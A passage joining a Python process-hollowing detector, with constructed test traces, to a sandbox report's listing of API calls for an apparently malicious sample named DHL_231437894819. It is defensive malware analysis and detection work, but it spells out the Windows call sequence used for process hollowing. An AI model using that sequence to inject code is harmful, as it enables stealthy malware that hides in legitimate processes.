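    context replaced after that child's memory was overwritten. Reads, the
    suspended flag and ResumeThread are recorded as supporting stages only,
    so a trace without the write-then-set-context core is never flagged.
    """
    verdict = HollowingVerdict()
    child_procs: set[int] = set()    # hProcess returned by CreateProcess*
    child_threads: set[int] = set()  # hThread returned by CreateProcess*
    written: set[int] = set()        # child processes that received writes

    for call in trace:
        a = call.args
        if call.api.startswith("CreateProcess"):
            child_procs.add(a["hProcess"])
            child_threads.add(a["hThread"])
            suspended = bool(a.get("dwCreationFlags", 0) & CREATE_SUSPENDED)
            verdict.stages.append("create_suspended" if suspended else "create")
        elif call.api == "ReadProcessMemory" and a.get("hProcess") in child_procs:
            verdict.stages.append("read_child")
        elif call.api == "WriteProcessMemory" and a.get("hProcess") in child_procs:
            written.add(a["hProcess"])
            verdict.stages.append("write_child")
        elif (call.api in ("SetThreadContext", "Wow64SetThreadContext")
              and a.get("hThread") in child_threads):
            if written:
                verdict.stages.append("set_context_after_write")
                verdict.suspicious = True
            else:
                verdict.stages.append("set_context")
        elif call.api == "ResumeThread" and a.get("hThread") in child_threads:
            verdict.stages.append("resume")

    verdict.child_handles = child_procs
    return verdict


# Constructed trace (assumption): the hollowing sequence built from the APIs
# listed in the report, with arbitrary handle values and addresses.
HOLLOWING_TRACE = [
    ApiCall("CreateProcessA", {"dwCreationFlags": CREATE_SUSPENDED,
                               "hProcess": 0x1A4, "hThread": 0x1A8}),
    ApiCall("ReadProcessMemory", {"hProcess": 0x1A4, "lpBaseAddress": 0x400000}),
    ApiCall("WriteProcessMemory", {"hProcess": 0x1A4, "lpBaseAddress": 0x400000}),
    ApiCall("WriteProcessMemory", {"hProcess": 0x1A4, "lpBaseAddress": 0x401000}),
    ApiCall("WriteProcessMemory", {"hProcess": 0x1A4, "lpBaseAddress": 0x402000}),
    ApiCall("Wow64SetThreadContext", {"hThread": 0x1A8}),
    ApiCall("ResumeThread", {"hThread": 0x1A8}),
]

# Constructed benign trace (assumption): a child started normally, and the
# only WriteProcessMemory targets the caller's own pseudo-handle (-1).
BENIGN_TRACE = [
    ApiCall("CreateProcessA", {"dwCreationFlags": 0, "hProcess": 0x2B0, "hThread": 0x2B4}),
    ApiCall("WriteProcessMemory", {"hProcess": 0xFFFFFFFF, "lpBaseAddress": 0x7FF000}),
]

if __name__ == "__main__":
    for name, trace in (("hollowing", HOLLOWING_TRACE), ("benign", BENIGN_TRACE)):
        v = detect_process_hollowing(trace)
        print(f"{name}: suspicious={v.suspicious} stages={v.stages}")
```

The detector keys on handles rather than on API names alone, so WriteProcessMemory against the caller's own process or a debugger's SetThreadContext on a thread it did not create are not scored; a real trace source (an API monitor or the sandbox's own call log) would supply the handle values that this page only shows as ?.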
                                                APIs
                                                • EnumThreadWindows.USER32(?,00000000,?), ref: 06D96C09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: EnumThreadWindows
                                                • String ID:
                                                • API String ID: 2941952884-0
                                                • Opcode ID: 655ab908073e9695771e067d85784bdb99a87d074553f4927661666d9fece49e
                                                • Instruction ID: 4265f2d96ed9e5078a3db6e1d8deab7e3339f6ebc6868c093a1c5b6106df49d3
                                                • Opcode Fuzzy Hash: 655ab908073e9695771e067d85784bdb99a87d074553f4927661666d9fece49e
                                                • Instruction Fuzzy Hash: 42211875D002498FDB10CFAAC984BEEFBF5FB88310F14842AE455A3251D778A945CFA5
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06D94668
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 7d95dc4a5e4e8e0bfc53e3de8071fb5484bd86243e18f08a6d6593c6a9f7922c
                                                • Instruction ID: 4eb062c9423c1e036fb17d60ef12efea8b2f38ff780069b6204da3b2e05f1b95
                                                • Opcode Fuzzy Hash: 7d95dc4a5e4e8e0bfc53e3de8071fb5484bd86243e18f08a6d6593c6a9f7922c
                                                • Instruction Fuzzy Hash: 352128B1D003599FDB10CFAAC880BDEBBF5FF48320F108529E519A7240D7789945CBA4
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D93B9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: ea50d739a1ffb099988a0c42469cd368426be6920d665883d05704cea0ce49fb
                                                • Instruction ID: d467935b05956f01b8aa963fa0c212c751ce272377d145ab5428b90090fcad01
                                                • Opcode Fuzzy Hash: ea50d739a1ffb099988a0c42469cd368426be6920d665883d05704cea0ce49fb
                                                • Instruction Fuzzy Hash: B6211871D007098FDB10DFAAC4857EEBBF4EF88224F148429D419A7240DB789945CFA4
                                                APIs
                                                • MessageBoxW.USER32(?,00000000,00000000,?), ref: 06D97105
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: Message
                                                • String ID:
                                                • API String ID: 2030045667-0
                                                • Opcode ID: 0bc38decff643d09710e3e48148c0e5675775ebcfc10a18ca574e45589a4aca8
                                                • Instruction ID: 9ca07f71bd1c427fddf0ebd129b6f009cb14252b32b235c41973526137fb45ac
                                                • Opcode Fuzzy Hash: 0bc38decff643d09710e3e48148c0e5675775ebcfc10a18ca574e45589a4aca8
                                                • Instruction Fuzzy Hash: 392104B6D003099FCB10CF9AD884ADEFBB5FB88314F10851EE419A7200C375A545CBA0
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012BD6E6,?,?,?,?,?), ref: 012BD7A7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 28aec6379f69db66b1cf96a3cd30d175766747ad1383806adfe7c4f5892d6570
                                                • Instruction ID: 2d9abca60658712ac667d3854b35a17fac2ca9e22a1df93d544022bdfdf8327d
                                                • Opcode Fuzzy Hash: 28aec6379f69db66b1cf96a3cd30d175766747ad1383806adfe7c4f5892d6570
                                                • Instruction Fuzzy Hash: 8D21E2B5D003499FDB10CFAAD984ADEBBF5FB48314F14841AE918A3211D378A954CF64
                                                APIs
                                                • EnumThreadWindows.USER32(?,00000000,?), ref: 06D96C09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: EnumThreadWindows
                                                • String ID:
                                                • API String ID: 2941952884-0
                                                • Opcode ID: 9f2bd299fa434d0be1bd388de7f311697fdb45dfab18391c6e4d3c7ba6d22d58
                                                • Instruction ID: 7c45d5ad9ae944e0ac60da4c9fbd0f3887cc52b0ceef9f35297652ae61d4cd63
                                                • Opcode Fuzzy Hash: 9f2bd299fa434d0be1bd388de7f311697fdb45dfab18391c6e4d3c7ba6d22d58
                                                • Instruction Fuzzy Hash: 8021F775D002498FDB14CF9AC944BEEFBF5FB88320F14842AE415A3251D778A945CF65
                                                APIs
                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 07117D33
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 9e4c9b1ead46d7353b8ab50d2d9d6dcd891604255c428eee25009e5cfdbfc5ed
                                                • Instruction ID: 8fe6235df0095ac6c1a180252d7577b00e814b33115e0ba12da59422ae917c0a
                                                • Opcode Fuzzy Hash: 9e4c9b1ead46d7353b8ab50d2d9d6dcd891604255c428eee25009e5cfdbfc5ed
                                                • Instruction Fuzzy Hash: 952136B5D002099FCB20CF9AD484BDEFBF4FB48320F10842AE858A7650D378A585CFA5
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06D944A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: da8d5df96463c514594b25cd532f9ada8e70a47f70665a2693bb8ccf555d23a0
                                                • Instruction ID: af539b7c357dc04c2a59c089159a04c74bab86be5035b67284d554f6a2d6e4e3
                                                • Opcode Fuzzy Hash: da8d5df96463c514594b25cd532f9ada8e70a47f70665a2693bb8ccf555d23a0
                                                • Instruction Fuzzy Hash: CC2147719003489FDB20DFAAC844BDEBBF5EF88320F24881DE955A7250CB799945CFA0
                                                APIs
                                                • MessageBoxW.USER32(?,00000000,00000000,?), ref: 06D97105
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: Message
                                                • String ID:
                                                • API String ID: 2030045667-0
                                                • Opcode ID: c3a03c1365f85408f432fea3432c49d25dd79e6b9f1f809837face9b9f9d448d
                                                • Instruction ID: ea0d3743610a489791010b377e2140cd2ec45cd123022907a0f8bb0c931a4be7
                                                • Opcode Fuzzy Hash: c3a03c1365f85408f432fea3432c49d25dd79e6b9f1f809837face9b9f9d448d
                                                • Instruction Fuzzy Hash: 0E21E3B5D003499FCB10CF9AD884ADEFBB5FB88314F10852EE819A7200C375A944CBA4
                                                APIs
                                                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,076EA9E2,?,?,?,?,?), ref: 076EAA87
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1477163310.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_76e0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: CreateFromIconResource
                                                • String ID:
                                                • API String ID: 3668623891-0
                                                • Opcode ID: 93867f043ab64da751b076f78399717f0ba55dd565e7fafc5e7846846576267a
                                                • Instruction ID: 1207faab2081cf2a06a22a3c8533fdb5027f0c22f77e51f37cda8e94b8d41f85
                                                • Opcode Fuzzy Hash: 93867f043ab64da751b076f78399717f0ba55dd565e7fafc5e7846846576267a
                                                • Instruction Fuzzy Hash: 65112CB59003499FDB10CF9AD544BEEBFF8EB48310F14841AE515A7210C375A994CFA4
                                                APIs
                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 07117D33
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 3871937adf8a87e7881b245e6305f0f3592c2736249f3ac53fea4ba77655762f
                                                • Instruction ID: ceab7cc52ce6dd03048cac1b3a0ab308dcccc7428f4bab5c34dcc390151b7133
                                                • Opcode Fuzzy Hash: 3871937adf8a87e7881b245e6305f0f3592c2736249f3ac53fea4ba77655762f
                                                • Instruction Fuzzy Hash: 5521E4B5D002499FDB20CF9AD484BDEFBF4FB48320F108429E959A7251D378A945CFA5
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06D944A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 5bf29461aafd7d654f58dbaf6e52c32db7870cbad0c3c25ff4c6e7702e2cc301
                                                • Instruction ID: bffd7259eeece66fd986ed5ef9e5cdee93d5e654095a61341bded0b4b27e779d
                                                • Opcode Fuzzy Hash: 5bf29461aafd7d654f58dbaf6e52c32db7870cbad0c3c25ff4c6e7702e2cc301
                                                • Instruction Fuzzy Hash: EF112975D003489FDB20DFAAC844BDEBBF5EF88320F148419D515A7250CB799945CFA0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 4a67b2ea16abf103f802cee9bb8f221bbe557a4f54c2b83b15d8fe66a4eec865
                                                • Instruction ID: 5429357b4268542312591d8359eaaf711e2ea569bb177c1fa27ed35d64ef8582
                                                • Opcode Fuzzy Hash: 4a67b2ea16abf103f802cee9bb8f221bbe557a4f54c2b83b15d8fe66a4eec865
                                                • Instruction Fuzzy Hash: AA114675D043488FDB20DFAAD4447EEBBF5EF88320F248819C459A7240CB39A946CFA4
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 06D966BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: 4daf7f96fddb2929709919ae34202673210797f88ffeda0f39a776a2bca93806
                                                • Instruction ID: 64e11730029e180f06f7fe265c8bb94670a9b7ec0a537ab8fbb35186740c97ab
                                                • Opcode Fuzzy Hash: 4daf7f96fddb2929709919ae34202673210797f88ffeda0f39a776a2bca93806
                                                • Instruction Fuzzy Hash: 591136B5C003488FDB20DF9AD845BCEBFF8EB88210F208459D418A3200D379A544CFA5
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: b81d0566d339eddf0805ddae05ea264e207f7f2c9ebbc39a288f27ac9f7a4725
                                                • Instruction ID: f4b2941781031192a8353c6d0da86f050648eb703d7d1ae7eaaef34b873adc5c
                                                • Opcode Fuzzy Hash: b81d0566d339eddf0805ddae05ea264e207f7f2c9ebbc39a288f27ac9f7a4725
                                                • Instruction Fuzzy Hash: D31125B5D003488FDB20DFAAC4457DEFBF5EB88220F248819D419A7240CB79A945CFA4
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 012BB09E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1466853559.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_12b0000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b33fc06784868f8eddd653253af141fefb7b69083e6fe66055f1d02463a3825d
                                                • Instruction ID: 30c6992b1ae3cc9fd2f974718fc4a5593c73cebf1005b472d0a8e8d38440704a
                                                • Opcode Fuzzy Hash: b33fc06784868f8eddd653253af141fefb7b69083e6fe66055f1d02463a3825d
                                                • Instruction Fuzzy Hash: A311E0B5D002498FDB20CF9AD484BDEFBF4EB88314F10881AD929A7610D379A545CFA5
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 06D974BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 001e71bdc789080cddf32dc1cdac91f4e72bb6d54a223d3320904830a978246e
                                                • Instruction ID: 82124e0bd5c32997b24e1c9a6ac9566add6e3b2b4a8b5bd30264b1b04f6b1a10
                                                • Opcode Fuzzy Hash: 001e71bdc789080cddf32dc1cdac91f4e72bb6d54a223d3320904830a978246e
                                                • Instruction Fuzzy Hash: 4711F8B58003489FDB10CF9AD445BDEFBF8EB48310F108419D559A3240C375A944CFA1
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 06D966BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: 503d88ad2e25702c77fade9257d870c8d7e64a244c9dadaed90559d2335afd3b
                                                • Instruction ID: c561e8f8c5123a864bbae8b040ce82ec421064e93f3b2b234a7800d10a2c2021
                                                • Opcode Fuzzy Hash: 503d88ad2e25702c77fade9257d870c8d7e64a244c9dadaed90559d2335afd3b
                                                • Instruction Fuzzy Hash: E01103B5D043488FDB20DF9AD444BDEBBF4EB48310F208459D519A7310D378A944CFA5
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 06D974BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1475926664.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6d90000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 8fd79c0610a0ade64ca2ac4393736aa79d7fefb16630484b7483cda8a6c72484
                                                • Instruction ID: 64751a1ebc8c8c1a5a751292d1d85c913e76c05b56b1b95b776e8e1782cf833f
                                                • Opcode Fuzzy Hash: 8fd79c0610a0ade64ca2ac4393736aa79d7fefb16630484b7483cda8a6c72484
                                                • Instruction Fuzzy Hash: 6311D3B58003499FDB20DF9AD885BDEBFF8EB48310F108419D559A7601C379A984CFA5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1463207620.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fad000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d6739ef051b14b792ba61a23758915798f22fdcb397af678d145b64e819dbf8
                                                • Instruction ID: 20c3914c45d1b2f69d3eb91c734a2b1119bc5001ab0e13142a396dc58b90def9
                                                • Opcode Fuzzy Hash: 3d6739ef051b14b792ba61a23758915798f22fdcb397af678d145b64e819dbf8
                                                • Instruction Fuzzy Hash: 212103B6500304DFDB05DF10D9C0B16BB65FB99324F20C169EC0A0B656C33AE856EAA2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1463207620.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fad000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2a4c8358c1ec6ac245830a98d8ee67507af9c31864bff4466f1ad8db976fda96
                                                • Instruction ID: b2e9e5c30148bc052b37f545f49c2289b1a038b3d81c403c57a1d69a96688259
                                                • Opcode Fuzzy Hash: 2a4c8358c1ec6ac245830a98d8ee67507af9c31864bff4466f1ad8db976fda96
                                                • Instruction Fuzzy Hash: C02128B2900244DFDB15DF10D9C0F26BF65FB89328F28C569E8060B656C336D856EBA2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1463339962.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fbd000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e3aa343f0851c913c2729b95a3acc3f1e272095f0ec0a314df8e2779554bbee4
                                                • Instruction ID: e946308b05a1441961606bff4a6cc28f6e4c4fe90c3ca5b8550fc109964c3018
                                                • Opcode Fuzzy Hash: e3aa343f0851c913c2729b95a3acc3f1e272095f0ec0a314df8e2779554bbee4
                                                • Instruction Fuzzy Hash: DC212575A04300DFDB14EF10D8C0B56BB61EB88364F20C569D80A0B24AD33AD847EE62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1463339962.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fbd000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 00c81ce952070f9c201e7f21ec7d7f1bb387f5064fbbd86c50ed5a40aff8f018
                                                • Instruction ID: 28e21083755ea18ae002a3f03e88c9aa6382c9dd8eb09bf8ed242729fad4b50c
                                                • Opcode Fuzzy Hash: 00c81ce952070f9c201e7f21ec7d7f1bb387f5064fbbd86c50ed5a40aff8f018
                                                • Instruction Fuzzy Hash: F821F571904384DFDB05DF11D9C0B55BB65FB84324F20C56DD8094B252D336D846DF62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1463339962.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fbd000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d23a5dd4c0efecf72b2eb15a4a247ee2a03445a91a6cfef045e7275e764bac04
                                                • Instruction ID: 14381caec59ca019bcb14bdd39f7b782a6d63ac1a95e27f051b853585d7b819e
                                                • Opcode Fuzzy Hash: d23a5dd4c0efecf72b2eb15a4a247ee2a03445a91a6cfef045e7275e764bac04
                                                • Instruction Fuzzy Hash: E0218E755093808FCB02DF20D990715BF71EB46324F28C5EAD8498B6A7C33A980ADB62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1463207620.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fad000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction ID: 322e922c28334e4456ed0180786095d351106b0164db58bfd51f46a435f10008
                                                • Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction Fuzzy Hash: 1D11E6B6D04280CFCB15CF10D5C4B1ABF71FB99328F28C6A9D84A0B656C336D856DBA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1463207620.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fad000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction ID: c4cdc3a1fd81f3dd66dae8d91559420e04c7bf442e478ba2b064e69bfc049087
                                                • Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction Fuzzy Hash: 041126B6804240CFCB05CF00D5C4B16BF71FB99324F24C2A9DC0A0B656C33AE856DBA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1463339962.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fbd000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction ID: c19e21410d692f4a11bd4bd10c4236b0b029edd5d1953dfe7c48e65f8f64ac0d
                                                • Opcode Fuzzy Hash: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction Fuzzy Hash: F311BB75904280DFCB05CF10C9C0B15BFA1FB84324F24C6A9D8494B296C33AD80ADF62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1463207620.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fad000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f4353d3af5f168b788aef9ef0f3ad4f8570e5cb05424440a4a6795a673111ebb
                                                • Instruction ID: 1a060016c3664aa474a6b46250f1686af5a3c36e3e5fe80e24229d1d3ccbdd72
                                                • Opcode Fuzzy Hash: f4353d3af5f168b788aef9ef0f3ad4f8570e5cb05424440a4a6795a673111ebb
                                                • Instruction Fuzzy Hash: 34012BB18043409FE7288E11CC84B66BBA8DF42374F14C51AED0A0A682D7799881DAB5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1463207620.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fad000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57f5d8e9ce5720568a943ccc434dd4c3715995506732e48cc53f2031bb416e82
                                                • Instruction ID: 587b7d992dfee795ed67bb854c3dcacaf01e5c1c9dbde5e9d26ad55cad41b4e5
                                                • Opcode Fuzzy Hash: 57f5d8e9ce5720568a943ccc434dd4c3715995506732e48cc53f2031bb416e82
                                                • Instruction Fuzzy Hash: 2EF0C2718043449EE7248E15C884B62FF98EB82334F18C05AED094A696C2799C44CBB1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: {#L
                                                • API String ID: 0-1361971085
                                                • Opcode ID: 9a99a6b1ce9dcfbd27bdb64627014967d34838e7a9833c101580157e2703ee71
                                                • Instruction ID: 5ec3d9e802cc44612f0ff92cab34e840fd86ee68b2d95853998c297d7ce6f9c0
                                                • Opcode Fuzzy Hash: 9a99a6b1ce9dcfbd27bdb64627014967d34838e7a9833c101580157e2703ee71
                                                • Instruction Fuzzy Hash: E9D117B1E15219DFCB58CFAAC98059EFBF6BF89300F14D52AD426AB264D7309942CF14
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1476880556.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7110000_DHL_231437894819.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: {#L
                                                • API String ID: 0-1361971085
